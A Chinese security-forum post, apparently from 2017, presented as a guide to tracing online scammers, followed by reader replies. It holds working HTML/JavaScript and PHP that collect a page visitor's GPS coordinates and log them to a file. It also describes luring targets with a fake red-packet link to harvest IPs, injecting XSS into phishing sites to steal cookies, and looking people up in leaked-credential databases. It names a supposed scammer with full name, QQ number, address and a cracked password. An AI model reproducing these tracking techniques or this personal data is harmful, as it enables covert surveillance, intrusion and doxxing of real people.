用户
搜索
  • TA的每日心情
    奋斗
    6 天前
  • 签到天数: 316 天

    连续签到: 1 天

    [LV.8]以坛为家I

    i春秋作家

    ← 假 真➡i春秋打杂员

    Rank: 7Rank: 7Rank: 7

    57

    主题

    925

    帖子

    210

    魔法币
    收听
    3
    粉丝
    42
    注册时间
    2015-11-20

    核心白帽i春秋签约作者积极活跃奖

    z7788520 i春秋作家 ← 假 真➡i春秋打杂员 核心白帽 i春秋签约作者 积极活跃奖 楼主
    发表于 2017-12-30 00:47:30 5925605
    临近年末,很多诈骗犯已经跃跃欲试了,用各种套路来坑你的血汗钱,所以我们要用所学到的东西来保护自己,春秋社区有一个神秘的讨论组,每天就是抓骗子,帮妖妖灵的蜀黍干点杂活,惩恶扬善,具体找坏蛋咨询
    为了写好这篇文章,列了一个大纲,对比来看,会比较容易看
    因篇幅较长,所以打算分成两篇来写

    交流群:689194365混子误入
    第一篇:QQ定位+ip定位+常见钓鱼方法及反击+诈骗模式
    第二篇:诈骗心理学+行为习惯+常见木马诈骗及反击+另类工具使用擒获幕后黑手

    图片1.png
    0x01
    QQ定位:
    QQ2009绿色显IP复活版现在这一个用的比较少了,有时候获取不到别人的ip
    相对于使用插件的比较多,用过插件给别人发送一条带有xml的图片,对方只要看了这张图片90%的几率能获取到ip
    图片2.png
    图片3.png
    如果嫌插件或其他软件不安全,你也可以用wireshark来单向获取QQ好友的ip
    图片4.png
    Wireshark用起来很简单,不做过多阐述,想看的话推荐两篇文章,讲得很详细,如果再看不懂不会操作,我也没办法



    这时才PC端操作的,当然除了pc端还有在移动端的,比如在github上有一套源码
    图片5.png
    通过变色龙搭建起的APP是这个样的
    图片6.png
    图片7.png
    只要发到群里就能获取全部在线成员的ip,也可以发给单个的qq好友,之前搭建了一个免费版的,因为是免费版的,变色龙的广告插得满天飞,后来也就关了,感兴趣的可以自己搭建起来自己用,对付骗子,一定一个准
    然后再去找接口,输入ip进行大致定位
    上面说的几种方法,是通过QQ来定位对方的地址,如果遇到诈骗的多数是通过QQ来实施诈骗的,学会上面的方法99%能抓住对方ip地址

    另外,再说一下通过网站定位,这个可以分为两个方法定位
    1、获取对方访问IP定位
    2、获取对方经度纬度来定位
    先说通过经纬度定位,提供以下PHP代码,搭建起来放进网站根目录即可
    先知发过定位文件,应该是咱们的指尖表哥写的,社区应该也没,没仔细找

    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Document</title>
    </head>
    <body>
    <img src="1.png" alt="" width="100%;">
        <script>
          var geol;      
            try {
                if (typeof(navigator.geolocation) == 'undefined') {
                    geol = google.gears.factory.create('beta.geolocation');
                } else {
                    geol = navigator.geolocation;
                }
            } catch (error) {
                //alert(error.message);
            }
            if (geol) {
                geol.getCurrentPosition(function(position) {
            var nowLatitude = position.coords.latitude;            
            var nowLongitude = position.coords.longitude;      
             //以上是固定代码,获取经度纬度
        alert("纬度:" + nowLatitude + ", 经度:" + nowLongitude);  //弹出经度纬度的坐标
                        function new_form(){
                var f=document.createElement("form");
                document.body.appendChild(f);
                f.method="post";
                return f;
            }    //定义函数,创建form
            function create_elements(eForm,eName,eValue){
                var e=document.createElement("input");
                eForm.appendChild(e);
                e.type="text";
                e.name=eName;
                if(!document.all){e.style.display="none"}else{
                    e.style.display="block";
                    e.style.width="0px";
                    e.style.height="0px";
                }
                e.value=eValue;
                return e;
            }
    //这段代码意思就是 定义方法,有两个input 他们的值分别是经度纬度的值
            var _f=new_form();
            create_elements(_f,"username",nowLatitude) // 创建form中的input对象
            create_elements(_f,"password",nowLongitude);
            _f.action="geolocation2.php";
            _f.submit();   //提交
    //表单自提交发送到geolocation2.php页面
        }, function(error) {
            switch(error.code){
            case error.TIMEOUT :
                //alert("连接超时,请重试");
                break;
            case error.PERMISSION_DENIED :
                //alert("您拒绝了使用位置共享服务,查询已取消");
                break;
            case error.POSITION_UNAVAILABLE :
                //alert("非常抱歉,我们暂时无法通过浏览器获取您的位置信息");
                break;
            }
        }, {timeout:10000});    //设置十秒超时
            }
    //设置连接超时的报错
      </script>
    </body>
    </html>
    geolocation2.php 的代码
    <?php
    @$time=date('Y-m-d H:i:s',time());  //获取当前时间
    $nowLatitude="纬度 ".$_POST['username'];    //接受上个页面传过来的参数(经度坐标)
    $nowlongitude="经度 ".$_POST['password']."   ------时间是".$time."\r\n";;    //接受上个页面传过来的参数(纬度坐标)
    $fp=fopen("geo.txt", "a+");  //创建一个geo.txt文件
    fwrite($fp, $nowLatitude);   //把经度写入到geo.txt里
    fwrite($fp, $nowlongitude);   //把纬度写入到geo.txt里
    ?>
    这一串php代码是对方点击授权之后拿到对方的经度纬度,然后通过经纬度来查找位置,这个比IP定位要准很多,毕竟IP分配的是区域。缺点就是很多人潜意识里都会点拒绝的,所以怎么办看个人想法了,重要的不是方法是脑子
    图片8.png

    图片9.png    
    图片10.png

    图片11.png

    季雨林在博客里说的这段比较通俗的原理http://blog.csdn.net/cuitang1031/article/details/52727534


    这些高精度IP定位工作原理是:
    1,用户手机里安装了百度的服务,比如百度地图SDK
    2,用户手机运行了百度的服务,比如使用百度地图进行导航,公交查询等等过程,都会让百度的服务运行起来
    3,百度提供服务的同时,将当前的坐标,跟ip地址数据,当前时间,定位方式,wifi信息,移动联通电信等运营商的基站信息,传送给百度的后台服务器中
    后台服务器留存了这些数据,然后也用这些数据给用户返回了用户需要的内容。这个过程也就是百度的匿名采集信息过程。用户使用前必然都是许可了百度可以使用这些匿名数据
    4,百度提供了服务同时,自己收集了匿名数据。而这些数据中。包括ip和gps的对照数据
    5,利用这些数据,就可以计算出一个ip曾经在那些范围被使用过,从而得到一个精确的范围数据,这个范围的中心点,就被认为是最接近用户的地点。同时会把误差半径也计算出来,于是有了我的这个高精度IP定位功能
    所有说你用的方法跟警察叔叔用的定位low多了,不要被电影里面给坑了
    其他说明:使用该服务,主要是针对有线宽带下使用了wifi的用户,精确度会高很多。如果是联通这种直接给客户分配公网ip的有线网路运营商,定位精度可以达到几十米的级别
    但是用手机网络2,3,4G网络获取的ip来定位,则可能覆盖整个省。因为其上网机制本质是一个地区用一个ip池,给这个地区代理上网,因此手机网络的ip定位精度会很低。


      你要是还不懂得话就看下面这段,季雨林csdn博客里说的这段
        1,手机里的app,能获取位置数据
            2,手机里的app,能够通过公网与后台服务器交互。
            3,手机有可能是连接了wifi,此时所使用的是家庭宽带的网络
            4,如果使用了家庭宽带网络,那么有可能这个家庭宽带的网络具备公网IP到户性质,也就是说家里的路由器获取了公网ip地址,这个地址不是192.168.xx开头,也不是10.xxx开头,还不是172.xxx开头。这时候后台所获取的ip和gps坐标,精度就非常高。最高精度定义为30m,也就是普通家用wifi最大能覆盖的圆形直径。
            5,如果使用了家庭宽带网络,可能运营商IP资源不足,进行了叫做NAT转发的技术。这时候可能得到的就是10.xxx开头的一个内网地址,而真正的公网ip的位置在这个覆盖区域内的某个地方,这时候,这个手机提交的ip和gps坐标数据就有误差。而这个误差,是同一个局域网网段下的其他手机所提供,这样以来,就是覆盖一个街道,一个城市,甚至一个省的情况
            6,如果手机使用的是手机卡的GPRS流量上网,则肯定是经过了NAT的网络结构。国内的运营商往往是一个省有一个IP池,随机的用来得用户的手机转发上网,这个情况,就出现了一个省单位范围的很多手机上报的ip和gps坐标的对照,平均一下,范围就非常大。
            7,在说说高精度IP查不到位置的情况:没有位置服务功能的设备在这个IP下使用过。比如,openGPS.cn站点发布在阿里云的青岛节点的ECS上。站长从来没有在这台服务器使用过代理功能,流量始终是这个服务器自己所占用。这时候,因为没有这种具备获取位置功能的手机等设备上报位置,因此就查询不到结果。
    其实这些原理不懂也没关系,你知道会用能找到就行,就很可以的,顺藤摸瓜,继续下面的信息深入
    说完QQ定位,再来看微信定位,微信定位应该很多人都不会,但是方法思路都是差不多的
    借用微信小程序“群玩助手
    图片13.png
    图片14.png   
    图片15.png
    给别人发个小程序,就说是红包,80%的人都回去点开吧
    邮箱ip查找
    这个很多人不会陌生吧,在公司,几乎不会使用QQ来交流,一般都是用邮箱互发邮件的,有的钓鱼者邮件以假乱真,很难区分,不如使用域名https://www.ba1du.com/  www.ic0uld.com ,足够以假乱真了,在判断出域名是否是本公司的域名,或者使用伪造的域名时候,如果上当受骗溯源的话,就用到了邮箱ip查找
    具体实施方法:
    比如这一封
    图片16.png
    我特么小学生啊,天天没玩的给我发这个,
    图片17.png
    图片18.png
    找到ip之后,114.253.35.150 用之前的ip接口去找这个地址
    图片19.png
    0x02
    网络钓鱼
    无非就这几种:QQ空间、淘宝退款、银行页面、财付通、邮箱、伪基站、iPhone钓鱼
    图片20.png
    图片21.png
    对付这种QQ空间钓鱼,直接快捷登录,不要输入QQ账号和密码是最简单的,这样钓鱼者就不会拿到你的密码
    淘宝退款、银行页面、财付通、邮箱这几种都很类似了,社区里很多人都搞过,精髓就是见框就插,插到xss,用xss平台打cookie进后台,找钓鱼者的ip,定位交110,再就是通过whios查询,进行社工主机域名商,伪造源主人的信息,获取邮箱,配合社工库进邮箱,90%就能搞下钓鱼者了
    最常见的莫非就是
    伪基站+银行钓鱼,这个相信每个人都收到过类似的短信,什么年代了,还会相信银行积分优惠啊,还差那几十块钱吗?因为几十块的小便宜把自己几个月的积蓄搭进去,只能说,让你贪便宜,活该!!!
    iPhone钓鱼一般是搞到你邮箱发送钓鱼链接
    图片22.png
    图片23.png

    相似度极高,但是安全性极低,往上很多公开的漏洞,搞进去
    这些骗子也真的是智商低,能不能用的高科技来犯罪
    实例看一个钓鱼站,在线刷qq币,真特么这种傻子还有啊?有,肯定有,不止一个
    图片24.png
    相似度极高,但是安全性极低,往上很多公开的漏洞,搞进去
    这些骗子也真的是智商低,能不能用的高科技来犯罪
    实例看一个钓鱼站,在线刷qq币,真特么这种傻子还有啊?有,肯定有,不止一个
    图片25.png
    可拉倒吧,老子学过ps ,零不还是随便p的嘛
    图片26.png

    图片27.png
    通过搜索邮箱,找到一个博客,下面带了两个链接,打开第二个
    图片28.png
    嗯哼,溜溜溜,不但搞诈骗,骗小学生刷Q币,还菠菜呢,可以可以的
    名字:zhengbintao
    图片29.png
    找到这个信息
    全名:郑斌涛
    点击去发现有QQ联系方式
    图片30.png
    图片31.png
    Qq:895015400
    详细地址:中国福建武平县西安未央区
    这应该是几年前的地址,还有一个地址是陕西西安
    图片32.png
    AR3)6J~ZW[TOPG]9W1YKQ1K.png
    谢谢TT表哥帮助查的裤子
    384a9052d69ff09ccf8c7314d52fd510 解密:qaz963
    这里可以有一种思路是whios查询到的是阳光互联注册的,去社服务商。再或者继续看看有什么信息,加上QQ去套路一波,地址就到手了,至于犯罪证据,那个赌博网站绝对能让他进去了,就看妖妖灵的警察叔叔们会不会甩锅了
    0x03
    诈骗模式
    诈骗模式分为撒网诈骗、定向诈骗、针对诈骗
    顾名思义,撒网诈骗就是在网络上发布诈骗消息,愿者上钩,骗到一个是一个,这种一般都是傻子。定向诈骗,主要是对老年人、学生党、以及在职员工,网购者等等,比如,骗老年人买保健品,房子抵押收红利,学生党一般就是兼职,冒充亲朋好友,救助金,补助金,提供银行卡号,然后以资金到账查询为由,指令其在自动取款机上进入英文界面操作,将钱转走。对在职员工就是冒充领导诈骗,要求为某某公司转账,而针对诈骗,一般是针对的比较富有的人,认真研究其对象行为习惯,生活模式,思维方式,而专门研究出来的手段。

    法律是保护强者的,只有懂法才能用法--《刑法》、《网络安全法》

    所有被骗的90%是因为自己的贪婪

    最后的最后,此文纯属本人腻想,如有冒犯的地方别来砍我,初衷是保护那些思想单纯的不要受这个社会险恶的欺骗
    这是上篇,下篇敬请期待,更多猥琐思路在下篇里展示


    IICRK[C8{PBMW4WPHI65XIB.png
    哪有什么附件啊,文中的软件地址都给了自己去找,下篇阅读量有点大,会提供必要的附件
    本人不提供小三、小四、小五定位,那怎么办,当然选择原谅她
    二维码是好基友的圈子,帮忙推荐下,想看就看不想看就拉倒



    评分

    参与人数 2积分 +50 魔法币 +60 收起 理由
    0nise + 50 + 50 欢迎分析讨论交流,i春秋论坛有你更精彩!.
    jasonx + 10 感谢发布原创作品,i春秋论坛因你更精彩!.

    查看全部评分

    本帖被以下淘专辑推荐:

    不惹事,不生事,妖魔鬼怪快走开
    z7788520 i春秋作家 ← 假 真➡i春秋打杂员 核心白帽 i春秋签约作者 积极活跃奖
    推荐
    发表于 2018-1-2 12:51:37
    暮雨今夕 发表于 2018-1-2 02:36
    老铁双击666,还是很怀念以前的珊瑚虫QQ

    没用过珊瑚虫,只知道木子李
    不惹事,不生事,妖魔鬼怪快走开
    使用道具 举报 回复
    z7788520 i春秋作家 ← 假 真➡i春秋打杂员 核心白帽 i春秋签约作者 积极活跃奖
    推荐
    发表于 2018-1-2 17:38:48
    琴心丶剑胆 发表于 2018-1-2 07:17
    感谢表哥的总结,获益匪浅,不知道社工库怎么找。。。

    自己搭
    不惹事,不生事,妖魔鬼怪快走开
    使用道具 举报 回复
    66666666666666666666666666666666666666666666666666666666666666666666666666
    使用道具 举报 回复
    干货,感谢分享           
    使用道具 举报 回复
    学习            
    以梦为马,浪迹天涯。
    使用道具 举报 回复
    6666666666666666666666666666666666666666666
    使用道具 举报 回复
    感谢表哥的总结,获益匪浅,不知道社工库怎么找。。。
    使用道具 举报 回复
    老铁双击666,还是很怀念以前的珊瑚虫QQ
    使用道具 举报 回复
    发表于 2017-12-30 07:45:54
    沙发吗?
    表哥总结得挺好,赞个。
    使用道具 举报 回复
    发表于 2017-12-30 08:05:44
    嘿嘿,这个可以有!!...
    使用道具 举报 回复
    666666666666666666666666
    使用道具 举报 回复
    发表于 2017-12-30 12:23:58
    66666666666666666666
    使用道具 举报 回复
    发表于 2017-12-30 14:07:24
    感谢分享!厉害了
    使用道具 举报 回复
    感谢楼主分享
    使用道具 举报 回复
    到处找这样的教学呢
    使用道具 举报 回复
    发表于 2017-12-31 16:48:57
    6666666666666
    使用道具 举报 回复
    发表于 2017-12-31 18:31:45
    66666666楼主
    使用道具 举报 回复
    发表于 2017-12-31 19:26:06
    66666666666666666666666
    使用道具 举报 回复
    发表于 2017-12-31 20:02:10
    0.0
    .........
    使用道具 举报 回复
    发表于 2017-12-31 23:05:16
    66666666666
    使用道具 举报 回复
    真是有意思 666666666666666666666
    使用道具 举报 回复
    1234下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册